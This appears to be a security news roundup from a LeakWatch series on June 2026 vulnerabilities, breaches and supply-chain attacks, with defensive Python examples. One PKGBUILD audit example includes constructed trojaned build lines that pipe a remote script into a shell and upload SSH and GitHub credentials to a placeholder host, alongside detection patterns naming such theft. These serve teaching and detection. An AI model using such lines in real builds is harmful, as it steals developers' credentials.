LeakWatch 2026: Week 24/25 Trends in Cybersecurity

https://www.igorslab.de/en/leakwatch-2026-week-24-25-2026-two-weeks-behind-and-a-rather-clear-trend/

Publish Date: 2026-06-20 00:20:00

Source Domain: www.igorslab.de

Author:

📖 Reading time: approx. 17 minutes · 3,252 words · 21,942 characters

Brief content overview

LeakWatch 2026 – LeakWatch week 24/25 2026, two weeks behind and a rather clear trend

This article reviews the security landscape of the past two weeks and identifies a clear trend: attacks are concentrating on business-critical IT control points such as VPN gateways, SD-WAN management, and backup servers. The shift is away from niche products and toward the components every modern IT environment depends on, which is where hardening, patch speed, and monitoring effort are needed most.

Assessment
The recent trend indicates a shift in attacks toward the control points of an environment rather than niche products. This highlights the importance of securing VPN gateways, SD-WAN management, and backup servers: each of them centralizes access, network control, or recovery, so a single compromise there has a very large blast radius.

Strengths
The article effectively identifies and summarizes key vulnerabilities and their implications for organizations, providing a clear overview of the current security landscape.

Limitations
The article lacks specific measured values and detailed technical specifications that could enhance the understanding of the vulnerabilities discussed.

Questions and answers

What is the main focus of the article? The article focuses on recent trends in attacks against business-critical IT control points such as VPN gateways, SD-WAN management, backup servers, SIEM instances, SaaS platforms, and package sources.
What vulnerabilities are highlighted? The article highlights actively exploited or critical vulnerabilities in VPN gateways (Check Point), SD-WAN management (Cisco), security platforms (Fortinet, Splunk), and backup servers (Veeam).
How many vulnerabilities were fixed in Microsoft’s June Patch Tuesday? Microsoft fixed 206 vulnerabilities, including three zero-days and 37 critical issues.
What is CVE-2026-42897? It is a cross-site scripting vulnerability in Microsoft Exchange Server that was actively exploited before being patched.
What should organizations focus on to improve security? Organizations should focus on securing control points such as VPN gateways, SD-WAN managers, and backup systems.
Generated as an editorial, reader-visible overview from the article content.

Sometimes a pause is not editorial silence, but simply the price of the fact that after a trade show, not only press kits, appointments, and meeting notes end up on the desk, but the actual follow-up work still has to be done. That was exactly the case after Computex. The regular LeakWatch issue had to wait because, alongside trade show reports, manufacturer meetings, follow-up research, and the usual day-to-day business, a stack had accumulated that could not be handled with a quick glance at a few headlines. This issue therefore turns out somewhat differently, namely as a concentrated review of the past two weeks, with an eye on the larger line behind it. And that line is relatively clear. The attacks of the past few days targeted less exotic niche products and more the boring but business-critical hinges of modern IT: VPN gateways, SD-WAN management, backup servers, SIEM instances, SaaS platforms, browsers, package sources, and credentials. Anyone striking at these points does not need to take over every individual endpoint. It is enough to compromise the door, the key ring, or the recovery process itself.

Microsoft’s June Patch Tuesday, volume alone is already a warning sign
Microsoft’s June Patch Tuesday was unusually large. CrowdStrike counts 206 fixed vulnerabilities, including three publicly known zero-days and 37 rated critical. What stands out is not only the number but the distribution: according to the analysis, Windows received the most fixes, followed by Extended Security Updates and Office, and the most common attack classes were privilege escalation, remote code execution, and information disclosure. That is not an academic metric but a practical prioritization aid, because exactly these classes form the bridge between initial access, persistence, and lateral movement in real attack chains.

Exchange Server received particular attention with CVE-2026-42897. The NVD describes the vulnerability as a cross-site scripting issue in Microsoft Exchange Server that allows an unauthenticated attacker to perform spoofing over the network. SecurityWeek adds that Microsoft closed it with the June Patch Tuesday and that it had been actively exploited beforehand. The technical classification matters: based on the public description, this is not a classic Exchange Server RCE in the style of the earlier ProxyShell debates, but an attack that plays out in the webmail context, that is, in the browser session of an already authenticated and therefore already privileged user. For administrators that makes the issue no less serious, but it prevents incorrect threat modeling: the question to ask is what an attacker can do with a user’s mailbox session, not whether the server itself is lost.
At the same time, it became clear once again how sensitive perceptions around coordinated disclosure have become. Reports on additional publicly discussed Defender and Windows issues show that the line between security research, pressure on vendors, and real endangerment of production systems is becoming increasingly thin. For companies, the sober conclusion is this: not every publicly discussed vulnerability is immediately exploited on a broad scale, but every public proof of concept shortens the time window in which an unpatched system can still be considered an acceptable residual risk.
VPN, firewall, and SD-WAN, the new old crown jewels
On 8 June, Check Point confirmed active exploitation of CVE-2026-50751, a critical authentication bypass in Remote Access VPN and Mobile Access, provided the outdated IKEv1 key exchange is still in use. The vendor states that, due to a logic flaw in certificate validation, an attacker can establish a VPN session without a valid user password. Check Point names only a few dozen specifically affected organizations worldwide, but references at least one case with subsequent activity by a Qilin ransomware affiliate. That makes the vulnerability a good example of what is so unpleasant about edge systems: the absolute number of victims may be small, but the quality of access can be very high. Because the precondition is the legacy key exchange, the first check alongside patching is whether IKEv1 is actually disabled on the gateway, rather than merely unused by the current client population.
Cisco also had to follow up again. SecurityWeek reports on CVE-2026-20262 in Cisco Catalyst SD-WAN Manager, an arbitrary file write vulnerability that Cisco says it observed in limited attacks in June 2026. According to the report, valid credentials with at least write permissions are required, which does not diminish the vulnerability but rather shifts it toward compromised administrative access. That is exactly where the real risk begins in SD-WAN environments, because the management plane decides routing, policies, and site connectivity. Anyone who reaches that layer does not merely gain a server, but potentially a piece of network logic.
Fortinet appeared in two separate contexts. On the one hand, CISA warned, according to The Hacker News, about ongoing activity against FortiGate systems in the context of the campaign referred to as FortiBleed, in which, according to reports, tens of thousands of devices or credentials are said to have been affected. On the other hand, several FortiSandbox vulnerabilities became publicly relevant, with Fortinet itself describing CVE-2026-39813 as a critical path traversal flaw in the JRPC API that under certain versions can enable an unauthenticated authentication bypass or privilege escalation. That security products themselves repeatedly become part of the attack surface is not new, but the concentration of edge and security platforms remains the truly unpleasant finding.
Splunk and Veeam, when defense and recovery themselves become the attack surface
With SVD-2026-0603, Splunk published a critical vulnerability in Splunk Enterprise, CVE-2026-20253. According to the advisory, in certain 10.x versions, unauthenticated users can create or truncate arbitrary files via a PostgreSQL sidecar endpoint if that service is reachable. Splunk rates the issue at CVSS 9.8, confirmed limited exploitation on 18 June, and recommends moving to fixed versions. As a workaround, the PostgreSQL sidecar can be disabled, provided the environment does not require dependent features such as Edge Processor, OpAmp, or SPL2 data pipelines. This is relevant because Splunk in many companies is not just any server, but a core component of detection, analysis, and forensic traceability. A SIEM instance whose file system can be manipulated is more than just a patching problem. It also affects chains of evidence, the integrity of analyses, and trust in log data. Anyone operating Splunk should therefore not only update, but also check whether unusual file operations, sidecar accesses, or unexpected process chains occurred before the patch.
Veeam, meanwhile, closed the critical vulnerability CVE-2026-44963 in Backup & Replication with KB4869. The vendor describes a remote-code-execution issue on the backup server by an authenticated domain user; affected are Veeam Backup & Replication 12.3.2.4465 and older version 12 builds, with the fix beginning in 12.3.2.4854. Particularly important is the note that only domain-joined backup servers are affected. In practice, however, that is not a special case at all, but rather the normal state in many mature environments. From a defender’s perspective, Veeam is a classic high-value target. Ransomware groups are interested not only in production data, but also in everything that enables or prevents recovery. Whoever controls the backup server can delete, encrypt, exfiltrate, or sabotage recovery plans. That is why this vulnerability does not belong in the category “at the next maintenance window,” but rather in the category “inventory, patch, check domain trust, secure logs.”
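The “inventory, patch, check domain trust” advice above reduces to a small triage over the backup server inventory. The following is an added example for this article, not Veeam’s own tooling, and the inventory records in it are constructed; the only facts it takes from the advisory are the first fixed build (12.3.2.4854), the version 12 scope, and the domain-joined precondition. It assumes the inventory carries the product build as a dotted string plus a domain-membership flag, which is not something KB4869 specifies.

```python
"""Triage a Veeam Backup & Replication inventory against CVE-2026-44963.

Added example for this article, not Veeam's own tooling. The inventory
records below are constructed; in practice they would come from a CMDB or
from querying each backup server. Assumed (not from KB4869): the inventory
carries the product build as a dotted string plus a domain-membership flag.
"""
from __future__ import annotations

from dataclasses import dataclass

# First fixed build named in KB4869; anything below it on the version 12
# branch is in the advisory's affected set.
FIXED_BUILD = (12, 3, 2, 4854)


@dataclass(frozen=True)
class BackupServer:
    host: str
    build: str          # e.g. "12.3.2.4465"
    domain_joined: bool


def parse_build(build: str) -> tuple[int, ...]:
    """'12.3.2.4465' -> (12, 3, 2, 4465), so builds compare numerically."""
    return tuple(int(part) for part in build.split("."))


def on_affected_branch(server: BackupServer) -> bool:
    """True if the build is a version 12 build older than the fix."""
    build = parse_build(server.build)
    return build[0] == 12 and build < FIXED_BUILD


def triage(inventory: list[BackupServer]) -> dict[str, list[str]]:
    """Bucket servers by urgency.

    patch_now:    affected build AND domain-joined, the exact combination the
                  advisory describes (an authenticated domain user reaches
                  code execution on the backup server).
    patch_soon:   affected build but standalone; outside the stated
                  precondition, still no reason to skip the update.
    not_affected: fixed build, or a build outside the version 12 range the
                  advisory lists (verify those against the vendor separately).
    """
    buckets: dict[str, list[str]] = {"patch_now": [], "patch_soon": [], "not_affected": []}
    for server in inventory:
        if not on_affected_branch(server):
            buckets["not_affected"].append(server.host)
        elif server.domain_joined:
            buckets["patch_now"].append(server.host)
        else:
            buckets["patch_soon"].append(server.host)
    return buckets


# Constructed inventory: hosts, builds and domain flags are made up.
INVENTORY = [
    BackupServer("vbr01.corp.example", "12.3.2.4465", domain_joined=True),
    BackupServer("vbr02.dmz.example", "12.3.2.4465", domain_joined=False),
    BackupServer("vbr03.corp.example", "12.3.2.4854", domain_joined=True),
    BackupServer("vbr04.branch.example", "12.1.0.2131", domain_joined=True),
]

if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket:13s} {', '.join(hosts) or '-'}")
```

The domain flag is the part worth getting right: a server that reports a fixed build is done, but a server that is not domain-joined today may be joined tomorrow, so the “patch_soon” bucket is a scheduling hint, not an exemption.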
SaaS and integrations, the blind spot between convenience and loss of control
According to reports, ServiceNow confirmed a security issue in which unauthenticated access to instances was possible under certain conditions. The Hacker News reports that ServiceNow rolled out a security update to hosted customer instances on 5 June and later confirmed that successful queries of instance tables had been observed for a subset of customers. TechCrunch adds that ServiceNow told the publication it categorized the incident as activity by security researchers in the context of bug bounty submissions, not as a classic hack by malicious actors. That distinction is important, but it does not change the fact that for affected customers the questions remain which data was queried, how it was logged, and whether sensitive information was forwarded internally.
The integration risk becomes even clearer in the case of Klue. BleepingComputer reports that attackers gained access to parts of the integration infrastructure via compromised legacy credentials, extracted OAuth tokens, and used them to retrieve data from connected customer environments, including Salesforce. According to the report, Klue stated there were no indications of a direct compromise of customer content stored directly in Klue; the incident was limited to third-party integrations. That sentence sounds reassuring, but it describes the core problem of modern SaaS landscapes: data does not only reside where the customer believes it does, but also in the token relationships between systems.
Oracle PeopleSoft also became a topic. BleepingComputer reports that ShinyHunters is claiming ongoing data theft attacks against PeopleSoft instances and speaks of data from more than 100 organizations. The actor claimed to have used a combination of older and zero-day vulnerabilities, while Oracle had not yet publicly issued a comprehensive statement at the time of the report. PeopleSoft in many organizations is not glamorous, but deeply integrated into HR, finance, procurement, or university administration. When data leaks there, it is rarely just a technical table, but personnel, payroll, contract, and organizational data.
Extortion remains data trading with a stage set
Reuters reported on 16 June about FulcrumSec and a claimed attack on Novo Nordisk. The group claims to have stolen more than one terabyte of data and, after an unsuccessful demand for 25 million US dollars, is considering selling or publishing parts of it. Novo Nordisk confirmed a cybersecurity incident on 11 June with unauthorized access to a limited number of internal IT systems and certain personal data, but Reuters could not independently verify the authenticity of the data claimed by the group. That limitation is crucial, because extortionists fundamentally frame their narratives to create maximum pressure. The case is still relevant because it shows how the extortion narrative is changing. It is no longer just about encrypted files, but about research, source code, clinical data, personal information, production environments, and internal AI models. When such claims are on the table, the effect on the market, partners, patients, research, and regulators is already there, even if individual data sets have not yet been verified. Modern extortion therefore increasingly functions as a mixture of data theft, PR operation, and due-diligence attack on trust in a company.
ShinyHunters also remained visible in recent weeks. At the Council of Europe, the group claimed, according to BleepingComputer, to have stolen more than 429,000 documents containing HR and payroll data from multiple departments. Here, too, the source is an attacker claim that the affected organization is investigating. But the stated data types, including payslips, personnel files, résumés, and potentially medical information, again show why HR systems have become among the most valuable targets. They contain identities, money flows, internal structures, and often enough sensitive attachments that were never intended for a public stage.
The 24-billion-record dataset, not everything is new, but everything is usable
On 17 June, Cybernews reported a publicly reachable Elasticsearch cluster with 24 billion records and more than 8.3 terabytes in size. According to the report, it contained usernames, email addresses, plaintext passwords, and login URLs, while Cybernews itself notes that it is unclear how many duplicates were included and how many unique individuals were affected. According to the report, the data came from 36 sources, including Telegram channels, older breach collections, infostealer logs, and possibly directly exported data from live systems. Cybernews later added that the dataset belonged to a threat intelligence or breach monitoring platform and had been exposed through a misconfiguration during a temporary migration. That makes the case not a classic single-company breach, but a kind of meta-leak. Such collections are particularly unpleasant because they combine old, new, and in some cases enriched credentials. Even if many records are duplicated, old, or already known, the practical damage remains high as soon as passwords are reused or infostealer logs contain not only passwords but also cookies, tokens, device information, and target URLs. For defenders, the question is less about the biggest number and more about the smallest still active combination of user, password, service, and missing multifactor protection.
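The closing point, that the dangerous quantity is the smallest still-active combination of user, password, service and missing MFA, is something a defender can compute rather than estimate. The block below is an added example for this article, not Cybernews tooling: it normalizes and deduplicates records from a dump, upgrades a credential when an infostealer copy also carried a session, and ranks what is left by whether it hits the organization’s own login surface, whether the account has MFA, whether a session accompanies it, and whether the password is reused elsewhere. The sample rows, the domain and the MFA list are constructed; in practice the rows come from a breach-monitoring feed and the MFA list from the identity provider.

```python
"""Rank records from a credential dump by what an attacker could still do
with them. Added example for this article, not Cybernews tooling. Sample
records, the MFA list and the domain are constructed; in practice the
records come from a breach-monitoring feed and the MFA list from the IdP.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass, replace
from urllib.parse import urlparse


@dataclass(frozen=True)
class Record:
    url: str                   # login URL as recorded in the dump
    user: str
    password: str
    source: str                # e.g. "combo_list", "infostealer"
    has_session: bool = False  # the log also carried cookies or tokens


def in_domain(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def normalize(rec: Record) -> Record:
    """Reduce the URL to a lower-case host and lower-case the user name so
    the same credential recorded by different sources collapses."""
    raw = rec.url if "://" in rec.url else "https://" + rec.url
    host = (urlparse(raw).hostname or "").lower()
    return replace(rec, url=host, user=rec.user.strip().lower())


def dedupe(records: list[Record]) -> list[Record]:
    """Collapse duplicates on (host, user, password). A later copy that
    carries a session upgrades the kept record: the attacker's best copy is
    what matters, not the first one we happened to see."""
    merged: dict[tuple[str, str, str], Record] = {}
    for rec in map(normalize, records):
        key = (rec.url, rec.user, rec.password)
        kept = merged.get(key)
        if kept is None:
            merged[key] = rec
        elif rec.has_session and not kept.has_session:
            merged[key] = replace(kept, has_session=True, source=rec.source)
    return list(merged.values())


def score(rec: Record, reuse_hosts: int, domain: str, mfa_users: set[str]) -> int:
    s = 0
    if in_domain(rec.url, domain) or rec.user.endswith("@" + domain):
        s += 3   # hits our login surface or our identity namespace
    if rec.user not in mfa_users:
        s += 2   # the password alone is sufficient
    if rec.has_session:
        s += 2   # cookies/tokens may sidestep MFA altogether
    if reuse_hosts > 1:
        s += 1   # same user+password seen against more than one service
    return s


def prioritize(records: list[Record], domain: str, mfa_users: set[str]) -> list[tuple[int, Record]]:
    uniq = dedupe(records)
    reuse: dict[tuple[str, str], set[str]] = defaultdict(set)
    for rec in uniq:
        reuse[(rec.user, rec.password)].add(rec.url)
    ranked = [(score(r, len(reuse[(r.user, r.password)]), domain, mfa_users), r) for r in uniq]
    ranked.sort(key=lambda item: (-item[0], item[1].user, item[1].url))
    return ranked


# Constructed sample dump: 5 rows, 4 unique credentials once normalized.
SAMPLE = [
    Record("https://vpn.example.com/login", "a.kowalski@example.com", "Winter2024!", "combo_list"),
    Record("vpn.example.com", "A.Kowalski@example.com", "Winter2024!", "infostealer", has_session=True),
    Record("https://shop.example.net/account", "a.kowalski@example.com", "Winter2024!", "combo_list"),
    Record("https://mail.example.com/owa", "j.doe@example.com", "correct-horse-battery", "combo_list"),
    Record("https://forum.example.org/login", "someone@gmail.com", "hunter2", "combo_list"),
]
MFA_USERS = {"j.doe@example.com"}   # constructed: who the IdP says has MFA enforced

if __name__ == "__main__":
    for points, rec in prioritize(SAMPLE, "example.com", MFA_USERS):
        flag = " +session" if rec.has_session else ""
        print(f"{points:2d}  {rec.user:24s} {rec.url:20s} {rec.source}{flag}")
```

In the constructed sample the top hit is not the newest record but the merged one: a VPN credential that appears twice, once as a plain combo-list row and once in an infostealer log with a session attached, for a user who reuses the password on an unrelated shop and has no MFA. That is the combination the article calls the smallest still-active one.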
Supply chains, developers, and the end of the comfortable package romance
The Record reported on 16 June that GitHub, according to security researchers, rejected two formal reports about design issues that are now being exploited by variants of the Shai-Hulud supply-chain worm. The attacks are linked to compromised packages and developer accounts, while the original malware is said to have emerged from the TeamPCP environment and imitators are now appearing. The details are still heavily shaped by the current state of research and reporting, but the larger point is clear: developer accounts, Actions, package releases, and CI/CD secrets are long since productive attack targets.
Arch Linux also received a stark reminder that community repositories are a trust model, but not a magical security boundary. The Hacker News reports on more than 400 manipulated AUR packages whose build scripts were altered so that a credential stealer was executed. Particularly perfidious is the fact that, according to the report, the official Arch repositories were not compromised; rather, abandoned community packages were taken over and their PKGBUILD or installation logic changed. The attack therefore targeted less a classic software vulnerability than social and organizational weaknesses in the package ecosystem. For developer workstations, this is an unpleasant finding. They contain SSH keys, GitHub tokens, npm access, container logins, cloud credentials, chat sessions, and often enough production access side by side. Anyone compromising a developer machine via a package, an extension, or a build script gains not only a machine, but potentially the tools to write into additional projects. That is exactly why software supply-chain security is becoming less and less a matter of checklists and more and more a question of cleanly separated identities, deliberate delays before adopting freshly published package versions, signatures, reproducible builds, and consistent token hygiene.
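Because the AUR attack changed build logic rather than exploiting a bug, the check a practitioner wants is a review of the PKGBUILD before it is built: what runs in prepare/build/package, which hosts it contacts beyond the declared sources, and whether integrity checks have been switched off. The following is an added example for this article, not an Arch or AUR project tool. Both PKGBUILDs are constructed (the package name, the `.invalid` host and the checksum are placeholders), and the indicator patterns are illustrative heuristics, not a complete signature set.

```python
"""Static pre-install review of an AUR PKGBUILD. Added example for this
article, not an Arch or AUR project tool. The two PKGBUILDs below are
constructed, including package name, hosts (.invalid TLD) and checksums;
the indicator patterns are illustrative heuristics, not a complete list.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

FUNC_RE = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*\(\)\s*\{", re.M)
URL_HOST_RE = re.compile(r"https?://([^/\s'\")]+)")
# SKIP is legitimate for VCS sources; for a tarball it disables integrity checking.
SUMS_SKIP_RE = re.compile(r"^\s*(?:sha\d+|md5|b2)sums(?:_\w+)?=\([^)]*\bSKIP\b[^)]*\)", re.M)

# (pattern, reason) applied line by line inside prepare()/build()/package()/...
LINE_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(?:ba|z)?sh\b", "remote script piped into a shell"),
    (r"(?:\$HOME|\$\{HOME\}|~)/\.(?:ssh|aws|npmrc|gnupg|docker|config/gh|git-credentials)\b",
     "touches credential files in the build user's home"),
    (r"\b(curl|wget)\b.*(?<!\S)(?:-d|-T|--data|--upload-file|--post-file)\b",
     "uploads data to a remote host"),
    (r"\bbase64\s+(?:-d|--decode)\b", "decodes an embedded base64 blob"),
    (r"\beval\b", "eval of a dynamically built command"),
]


@dataclass(frozen=True)
class Finding:
    where: str
    reason: str
    snippet: str


def extract_functions(text: str) -> dict[str, str]:
    """Return {name: body} for every shell function, by brace matching."""
    funcs: dict[str, str] = {}
    for m in FUNC_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        funcs[m.group(1)] = text[m.end():i - 1]
    return funcs


def declared_hosts(text: str) -> set[str]:
    """Hosts named in url= and source=() are the only ones a build should contact."""
    top_level = text
    for body in extract_functions(text).values():
        top_level = top_level.replace(body, "")
    return {h.lower() for h in URL_HOST_RE.findall(top_level)}


def audit(text: str) -> list[Finding]:
    findings: list[Finding] = []
    skip = SUMS_SKIP_RE.search(text)
    if skip:
        findings.append(Finding("checksums", "integrity check disabled (SKIP)", skip.group(0).strip()))
    known = declared_hosts(text)
    for name, body in extract_functions(text).items():
        for line in body.splitlines():
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in LINE_PATTERNS:
                if re.search(pattern, stripped):
                    findings.append(Finding(f"{name}()", reason, stripped))
        for host in sorted({h.lower() for h in URL_HOST_RE.findall(body)} - known):
            findings.append(Finding(f"{name}()", f"undeclared network host: {host}", host))
    return findings


# Constructed, clean PKGBUILD (the all-zero checksum is a placeholder).
BENIGN = r'''pkgname=example-tool
pkgver=1.4.2
pkgrel=3
pkgdesc="Constructed sample package, not a real AUR entry"
arch=('x86_64')
url="https://github.com/example-org/example-tool"
license=('MIT')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example-org/example-tool/archive/v$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
'''

# What an abandoned-package takeover might splice into build(): the build
# still succeeds, but the building user's keys leave the machine first.
INJECTED = r'''  make
  # runs with the building user's permissions, long before pacman -U
  curl -fsSL https://updates.example-cdn.invalid/setup.sh | sh
  tar czf /tmp/.cache.tgz "$HOME/.ssh" "$HOME/.config/gh" 2>/dev/null
  curl -s -T /tmp/.cache.tgz https://updates.example-cdn.invalid/u
'''
TROJANED = BENIGN.replace("  make\n", INJECTED).replace("0" * 64, "SKIP")

if __name__ == "__main__":
    for f in audit(TROJANED):
        print(f"{f.where:10s} {f.reason}: {f.snippet}")
```

The undeclared-host check is the one that survives obfuscation best: a build that needs the network beyond what `source=()` lists is a question in itself, whatever the command looks like. The rest are cheap pattern hits that should be read as prompts for a manual diff against the previous PKGBUILD revision, not as a verdict.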
SocGholish, WordPress, and the cleanup of old infection chains
As part of a special analysis, Shadowserver reported that Dutch authorities had removed SocGholish backdoors and malware from 14,971 legitimate WordPress sites. In addition, 106 servers and domains were taken offline worldwide. The action was part of Operation Endgame and targeted an infrastructure that has been delivering initial access through fake update campaigns for years. Shadowserver also refers to data on more than 1.4 million compromised WordPress instances that were available for SocGholish between May 2023 and May 2026. This is also relevant for smaller site operators, because SocGholish does not function like an isolated defacement attack. A compromised WordPress site can become a delivery point for fake browser updates, which in turn lead to downloaders, infostealers, or later ransomware access. Cleaning up a site is therefore only the first step. Passwords, unknown user accounts, plugins, themes, server privileges, and old web shells must also be checked, otherwise the supposedly harmless company website remains the entry point into foreign networks.
Classification: the last two weeks were not an outlier
The common denominator of these two weeks is not “more cybercrime,” because that statement would be too broad. More precisely: attackers are continuing to work at the points where organizations centralize control. VPN gateways centralize access. SD-WAN managers centralize network control. Backup systems centralize recovery. SIEM systems centralize visibility. SaaS platforms centralize business processes. Package repositories centralize trust. OAuth tokens centralize convenience. This centralization is what makes modern IT efficient, but it also creates points where a single failure has a very large impact.
The pause in LeakWatch was therefore not ideal, but it at least had the editorial side effect of making the patterns more visible. A single patch day, a single threat actor claim, or a single compromised OAuth token can quickly appear to be an isolated incident. In the two-week view, a different picture emerges. The attacks continue to shift away from individual clients toward the control points, and that is exactly where inventory, patch speed, segmentation, logging, and access hygiene must become much more consistent.

What is LeakWatch?

As part of this editorial project, a separately programmed and trained bot is used for the author’s specialized internet research, which performs automated analysis of relevant data sources and also creates translations. The aim is to use primary sources that are as unaltered as possible, which is why all links are recorded in tabular form to enable optional in-depth research by interested readers. Without AI support, the automated search and extraction would only be feasible with disproportionate effort; nevertheless, every evaluation and the actual text production are carried out editorially, and everything is also reviewed again for content, as the AI cannot interpret or formulate all content with complete reliability. LeakWatch is designed as a periodic security and leak analysis format created in the style of igor’sLAB and in accordance with specific requirements. The focus is on verifiable events from primary sources, technical classification, and a fully neutral assessment without the influence of already filtered third-party secondary information.
